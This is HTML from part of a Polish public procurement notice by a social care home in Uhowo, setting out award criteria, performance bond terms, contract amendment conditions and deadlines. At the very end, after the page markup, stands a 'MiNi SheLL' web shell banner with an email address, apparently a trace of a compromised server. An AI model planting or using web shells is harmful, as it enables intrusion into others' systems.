<b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>jakość</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena ofertowa brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Projekt umowy (Istotne postanowienia umowy) stanowi Załącznik nr 8 do SIWZ</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający będzie żądać od Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, wniesienia zabezpieczenia należytego wykonania umowy o wartości 5 % ceny ofertowej brutto.Zabezpieczenie należytego wykonania umowy może być wniesione w jednej lub kilku następujących formach:o	w pieniądzu,o	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,o	gwarancjach bankowych,o	gwarancjach ubezpieczeniowych,o	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.Zabezpieczenie należytego wykonania umowy wnoszone w pieniądzu należy wpłacić na konto Domu Pomocy Społecznej w Uhowie - 30 1020 1332 0000 1302 1061 9262 (Powszechna Kasa Oszczędności Bank Polski SA)Zamawiający ustala podział zabezpieczenia należytego wykonania umowy na dwie części:o	70 % wartości zabezpieczenia służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy, które zostanie zwrócone Wykonawcy w terminie określonym w art. 151 ust. 1 ustawy, tj. w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane,o	30 % wartości zabezpieczenia służyć będzie pokryciu roszczeń z tytułu rękojmi za wady, które zostanie zwrócone Wykonawcy w terminie określonym w art. 151 ust. 3 ustawy, tj. nie później niż w 15. dniu po upływie okresu rękojmi za wady.Przyjęte przez Wykonawcę formy zabezpieczenia powinny:o	uwzględniać zróżnicowanie zabezpieczenia wg wyżej określonych części,o	umożliwić Zamawiającemu jego zwrot w terminach właściwych dla każdej z tych części.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej Umowy w stosunku do treści oferty przy wystąpieniu przynajmniej jednego z następujących warunków:1)	Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez przedłużenie terminu wykonania robót o okres odpowiadający wstrzymaniu lub opóźnieniu robót w przypadku:a)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami;b)	wystąpienia wad dokumentacji technicznej, skutkującej koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju robót, mających wpływ na termin wykonania Umowy;c)	niemożliwego do przewidzenia wystąpienia niekorzystnych warunków atmosferycznych, uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej Umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;d)	wystąpienia konieczności wykonania zamówień dodatkowych, zwiększenia ilości robót, lub innego sposobu wykonania przedmiotu umowy, wstrzymujących lub opóźniających realizację robót będących przedmiotem Umowy, a ich realizacja jest konieczna dla uzyskania efektu końcowego, a których nie dało się przewidzieć wcześniej;e)	wystąpienia opóźnienia w dokonaniu określonych czynności lub ich zaniechania przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;f)	niemożliwości wykonywania robót, gdy obowiązujące przepisy nie dopuszczają do wykonywania robót lub nakazują wstrzymanie robót z przyczyn niezawinionych przez Wykonawcę.g)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności m.in. w wyniku działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron np. badań archeologicznych, okoliczności stanowiących zagrożenie dla życia i mienia. Dla powyższych przypadków wystąpienia opóźnień, strony ustalą nowe terminy realizacji, z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie danemu okresowi powodującemu opóźnienie. 2)	Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy, jest możliwa poprzez zmianę sposobu wykonania przedmiotu Umowy lub wydłużenie czasu wykonania Umowy o ile nie powodują one zmiany zakresu świadczenia wykonawcy, zawartego w ofercie oraz zwiększenia kosztów realizacji inwestycji w przypadku:a)	zmian technologicznych - o ile są korzystne dla Zamawiającego, pod warunkiem, że są spowodowane w szczególności następującymi okolicznościami:- niedostępnością na rynku na rynku materiałów lub urządzeń wskazanych w dokumentacji technicznej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;- pojawienie się na rynku materiałów lub urządzeń nowszej generacji, pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu Umowy, lub umożliwiające uzyskanie lepszych wskaźników energetycznych dla Obiektu oraz lepszej jakości robót;- pojawienie się nowszej technologii wykonania zaprojektowanych robót, pozwalającej na zaoszczędzenie czasu realizacji inwestycji, jak również kosztów eksploatacji wykonanego przedmiotu Umowy;b)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na wystąpienie niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;c)	odbiegających w sposób istotny od przyjętych w dokumentacji technicznej warunków terenowych, w szczególności braku zinwentaryzowania Obiektu lub zinwentaryzowania go w sposób wadliwy;d)	uzasadnionej konieczności zaangażowania podwykonawcy w trakcie realizacji przedmiotu Umowy o roboty budowlane, spowodowanej ww. przesłankami lub mającymi wpływ na terminowe i należyte wykonanie umowy, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.Wszystkie powyższe postanowienia stanowią katalog rozwiązań w stosunku do przewidywanego w dokumentacji technicznej sposobu wykonania przedmiotu Umowy, na które Zamawiający może wyrazić zgodę po uprzednim zgłoszeniu przez kierownika robót i uzgodnieniu możliwości ich wprowadzenia. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-09-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"> </span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30 dni </span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com